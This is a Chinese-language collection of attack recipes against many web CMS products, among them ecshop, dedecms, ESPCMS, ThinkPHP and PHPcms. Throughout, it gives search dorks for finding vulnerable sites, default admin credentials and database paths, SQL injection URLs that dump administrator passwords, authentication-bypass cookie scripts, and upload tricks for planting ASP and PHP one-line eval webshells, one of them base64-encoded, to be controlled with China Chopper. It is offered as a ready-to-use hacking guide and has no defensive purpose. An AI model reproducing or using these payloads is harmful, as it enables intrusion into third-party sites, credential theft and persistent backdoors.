關鍵詞：inurl:showkbxx.asp?id= 默認數據庫：data/xy#!123.mdb 默認帳戶密碼：admin admin 找到網站配置，在網站名稱裏面直接插入一句話：網站」%><%eval request(「x」)%><%’，注意不要刪掉網站名稱！而後中國菜刀鏈接：/inc/config.asp

【 szwyadmin漏洞繞事後臺驗證 】

關鍵字:inurl:szwyadmin/login.asp
javascript:alert(document.cookie=」adminuser=」+escape(「‘or’=’or'」));javascript:alert(document.cookie=」adminpass=」+escape(「‘or’=’or'」));javascript:alert(document.cookie=」admindj=」+escape(「1″));

1.後臺通常存在一個szwyadmin文件夾，複製一下後臺地址放在一邊，以後複製代碼替換後臺地址訪問進行注射！

2.這時會彈出一個窗口，連續點擊三次肯定。

3.從新訪問後臺地址，把網站後面的/login.asp 換成 admin_index.asp 奇蹟般的直接進入後臺了！
==========================================================================================================================

【 醫院建站系統任意文件上傳漏洞 】

關鍵詞：inurl:cms/Column.aspx?
關鍵詞：inurl:cms/Column.aspx?LMID=
漏洞利用 ：xtwh/upfile.aspx
直接上傳aspx木馬拿shell。
==========================================================================================================================

【 嘉友科技cms上傳漏洞 】

谷歌關鍵字：inurl:newslist.asp?NodeCode=
程序採用的上傳頁uploadfile.asp未進行管理驗證，致使創建畸形目錄上傳圖片木馬獲取shell漏洞。
exp：ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp他原上傳目錄是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
並且他的上傳文件沒有過濾致使未受權訪問，直接上傳小馬，而後小馬後面寫爲1.jpg 訪問路徑 查看源代碼。
==========================================================================================================================

【 ecshopcms後臺拿shell 】

支持最新2.7.2版本，通殺最新版本後臺低權限！

後臺-訂單管理-訂單打印-選擇源代碼編輯-保存-返回訂單列表，隨意選擇一個訂單打印，返回OK，生成一句話成功-在根目錄生成了一個null.php，一句話密碼：usb
==========================================================================================================================

【 教育站sql注入通殺0day 】

關鍵詞：inurl:info_Print.asp?ArticleID=
默認後臺：www.xx.com/ad_login.asp
好比：http://www.xx.com/info_Print.asp?ArticleID=539
加上：union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
這樣就直接獲得了管理員帳戶和通過Md5加密的密碼了。
==========================================================================================================================

【 IIS7.0 畸形解析漏洞通殺oday 】

找到某個使用IIS7.0架設的站，而後找到其中的圖片上傳點（不須要管理權限，普通註冊用戶便可搞定），把PHP一句話圖片木馬綴改爲.jpg，傳上去，獲得圖片地址。
在圖片格式後面添加xx.php xx隨便你怎麼填，只要後綴爲.php就好，以後菜刀鏈接便可！
==========================================================================================================================

【 Yothcms 遍歷目錄漏洞 】

優斯科技企業網站管理系統(YothCMS)是一款徹底開源免費的CMS。
默認後臺：admin/login.asp
遍歷目錄：ewebeditor/manage/upload.asp?id=1&dir=../
數據庫路徑：%23da%23ta%23%23db_%23data%23%23.asa
==========================================================================================================================

【 傳信網絡獨立開發網站源碼0day漏洞 】

默認後臺：system/login.asp
編輯器後臺路徑：ubbcode/admin_login.asp
數據庫路徑：ubbcode/db/ewebeditor.mdb
默認帳號密碼：yzm 111111
==========================================================================================================================
【

科訊cms 6.5後臺拿shell 】

1.能夠在數據庫備份中找到網站的絕對路徑
2.利用科訊SQL注入漏洞利用工具也能找到進入後臺後執行sql命令：
create table E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a varchar(50))
insert into E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’)
接着數據庫備份成1.asp 菜刀鏈接密碼：#
==========================================================================================================================

【 動易2006後臺拿shell 】

進入後臺後，咱們在左邊菜單欄中選擇「系統設置」，而後在出現的菜單欄裏選擇「自定義頁面管理」，
接着須要先添加一個自定義頁面分類，選擇「添加自定義分類」這個選項，分類名稱與分類簡介均可以隨便填寫。填寫完畢後選擇「添加」，系統提示添加成功。
下面再來選擇「添加自定義頁面」，「頁面名稱」隨便輸入，「所屬分類」就是剛纔創建的分類就能夠了。「頁面類型」和「頁面路徑」都不用管，保持默認.
不過若是沒有改頁面路徑的話，默認生成的文件是在根目錄下的，也就是http://www.xx.com/maer.asp.「文件名稱」即輸入生成的木馬的文件名。
「頁面簡介」也不用管，下面就是頁面內容了。這裏填入小馬的代碼。一切完畢點擊「添加」會提示保存自定義頁面成功。最後一步是要生成咱們的木馬頁面。
選擇「自定義頁面管理首頁」，點擊右邊出現的「生成本頁」就OK 了，成功得到動易的shell。
==========================================================================================================================

【 Shopex4.8.5 注入漏洞後臺拿shell 】

關鍵詞：powered by shopex v4.8.5
exp:Shopex 4.8.5 SQL Injection Exp

Shopex 4.8.5 SQL Injection Exp (product-gnotify)

fuck

 

保存爲html格式，替換代碼中的網站，本地打開後點擊小圖標，出現新頁面，賬號密碼爆出來了，默認後臺：shopadmin
拿shell方法….

第一步 頁面管理 修改模版 而後選一個XML編輯
開始用 live http 抓包 大家懂的 而後把第一個POST包給抓出來

而後改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解釋一下 id是你選擇的模版文件夾名稱 後面的info.xml 是你修改的XML文件 tmpid= 大家懂的 就是模版文件夾 而後 name 是你提交的文件名字 file_source 是後門或者shel
我這裏是一句話 大家懂的 而後提交了以後 地址是這樣的http://Madman.in/themes/文件名稱/你的木馬名稱
—————————————————————————————————————————————————————-

【 ecshop漏洞總彙 】

關鍵字：powered by ecshop普通代碼：user.php?act=order_query&order_sn=’ union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*
變種代碼：search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
直接在網站後臺加入代碼回車就能爆出賬號密碼，再去掉代碼加上/admin回車就能直接進後臺了。拿shell方法很簡單，找到「庫項目管理」再選擇「配送的方式」，在代碼最下面插入php一句話木馬： 不行就換php木馬的預代碼！
接着保存，一句話路徑是：http://www.xxx.org/myship.php ; 打開「ASP+PHP兩用Shell.html」填入地址，點擊一下環境變量，成功以後點擊上傳文件就能夠拿shell了。
—————————————————————————————————————————————————————-

【 帝國cms 6.6最新版本 】

自定義頁面-增長自定義頁面-隨便寫個.php文件名，內容寫：
若是內容直接添一句話或者php大馬是無用的，由於他會生成xxx.php前先給你執行，
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 的base64加密。
因此生成xxx.php後 會出現內容 在文件裏，而後用菜刀直接鏈接吧。
—————————————————————————————————————————————————————-

【 phpweb 】

關鍵字：inurl:down/class/index.php?myord=
後臺地址：admin.php
萬能密碼：admin ‘or ‘1’=’1
注入地址：down/class/index.php?myord=1
表段：pwn_base_admin
拿shell通殺漏洞：登入後臺–文章–文章發佈–文章內容裏的圖片上傳按鈕–抓包以後改包NC提交。
也能夠用下面的exp拿shell：
用火狐瀏覽器登陸後臺，由於火狐瀏覽器有保留cookies的功能， 找到「phpweb之exp」這個html，拉進火狐瀏覽器器裏上傳1.php;.jpg的一句話木馬，查看源碼菜刀鏈接！
—————————————————————————————————————————————————————-

動科(dkcms)漏洞:

官方網站：www.dkcms.com主要是差很少3個版本爲主吧，
V2.0 data/dkcm_ssdfhwejkfs.mdb
V3.1 _data/___dkcms_30_free.mdb
V4.2 _data/I^(()UU()H.mdb
默認後臺：admin
編輯器：admin/fckeditor
後臺拿shell，fck編輯器突破可拿shell
創建asp文件夾
Fck的路徑：Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp
—————————————————————————————————————————————————————-

ESPCMS通殺0day :

關鍵字：inurl:index.php?ac=article&at=read&did=
默認後臺：adminsoft/index.php siteadmin/index.php
注入點(爆表前綴)：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆賬號：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密碼：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
賬號和密碼一次性爆：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
進到後臺後，直接點擊分類圖片-修改-選擇文件-直接上傳php一句話木馬
PS：當上傳不了php木馬時，去系統設置一下，添加圖片上傳格式 |php ，這樣就能夠上傳一個圖片文件頭的php木馬。
—————————————————————————————————————————————————————-

Thinkphp框架任意代碼執行漏洞 :

ThinkPHP是一款國內使用比較普遍的老牌PHP MVC框架
關鍵字：thinkphp intitle:系統發生錯誤
獲取Thinkphp的版本號：index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
獲取服務器的配置信息：index.php/module/aciton/param1/${@phpinfo()}
列出網站全部文件列表：index.php/module/action/param1/{${system($_GET[‘x’])}}?x=ls -al
直接在網頁執行一句話：index.php/module/action/param1/{${eval($_POST展開)}}
菜刀鏈接：http://www.xxx.com/index.php/module/action/param1/{${eval($_POST展開)}} 密碼：s
—————————————————————————————————————————————————————-

良精系統 :

( 爆管理員賬號密碼的代碼 )
NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20」=’
（ 一句話木馬的妙用 ）
插入一句話木馬後，鏈接網站的配置文件：inc/config.asp 密碼都是g
1.網站配置-容許的上傳文件類型-插入閉合的一句話木馬：」%><%eval request(「g」)%><%s=」 不行就增長一個cer格式，以後上傳cer格式的木馬便可 2.網站配置-網站地址-插入閉合的一句話木馬：http://」%><%execute(request(「g」))%><%’ 3.網站配置-網站名稱-插入閉合的一句話木馬：滄州臨港彩越化工有限公司」%><%eval request(「g」)%><%s=」 4.網站配置-版權信息-插入閉合的一句話木馬：」%><%eval(request(chr(103)))%><%’
（ 利用upfile_other.asp漏洞拿shell ）
直接訪問會員中心：userreg.asp
註冊一個用戶並在未退出登陸的狀態下，使用雙文件上傳工具足以爆它菊花，如下代碼保存爲1.html，並裏面的修改目標站，第一個上傳jpg，第二個上傳cer

另外能夠利用會員中心的cookies，用火狐瀏覽器登錄以後，訪問upfile_other.asp頁面，用抓包工具去抓包，接着用明小子上傳拿shell.

 

（ 上傳漏洞 ）
漏洞文件：Upfile_Photo.asp
前提是進入後臺了，訪問這個文件，將提示「請先選擇你要上傳的文件！」，用抓包工具抓管理員的cookies，再把上傳地址跟cookies扔到名小子裏上傳拿shell

（ 南方在線編輯器 ）

默認後臺：admin/Southidceditor/admin_style.asp
數據庫路徑：admin/SouthidcEditorDatasSouthidcEditor.mdb
遍歷目錄：admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..
文件上傳頁面：admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
樣式設置頁面：admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
—————————————————————————————————————————————————————-

dedecms注入漏洞及找後臺技巧 :

訪問這個：plus/search.php?keyword=as&typeArr[ uNion ]=a
看結果若是提示：Safe Alert: Request Error step 1 !那麼直接用下面的exp爆出全部管理員的賬號密碼：
plus/search.php?keyword=as&typeArr[111%3D@')+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@'+]=a
看結果若是提示：Safe Alert: Request Error step 2 !
那麼直接用下面的exp爆出全部管理員的賬號密碼
plus/search.php?keyword=as&typeArr[111%3D@')+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%23@__admin%23@'+]=a
有些/plus/目錄換成了/plugins/目錄，這時就要把/plus/換成/plugins/進行注射了
破解出md5爲20位結果，只須要把前三位和後一位去掉，剩餘16位拿去解密便可
如何找後臺？
默認後臺：dede
第一種方法：data/mysql_error_trace.inc （有時能夠爆出路徑）
第二種方法：把域名做爲後臺去嘗試
第三種方法：查看這個文件：robots.txt
第四種方法：ping下域名得到ip以後，http://www.bing.com/ 搜索：ip:127.0.0.1 php （可能得到後臺也能夠得到其餘旁註站，通常dede的旁站不少也是dedecms的）
—————————————————————————————————————————————————————-

 

PHPcms V9 爆數據庫信息漏洞:直接爆出數據庫鏈接信息：/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php關於後臺拿webshell：進入後臺後點擊界面–模版風格–隨便找個頁面點擊修改，插入咱們的一句話代碼 @fwrite($fp, ‘<‘.’?php’.」rnrn」.’eval($_POST[0day])’.」rnrn?」.」>rn」);點擊保存，接着點擊可視化，代碼就成功執行了，接着菜刀鏈接/0day.php，密碼0day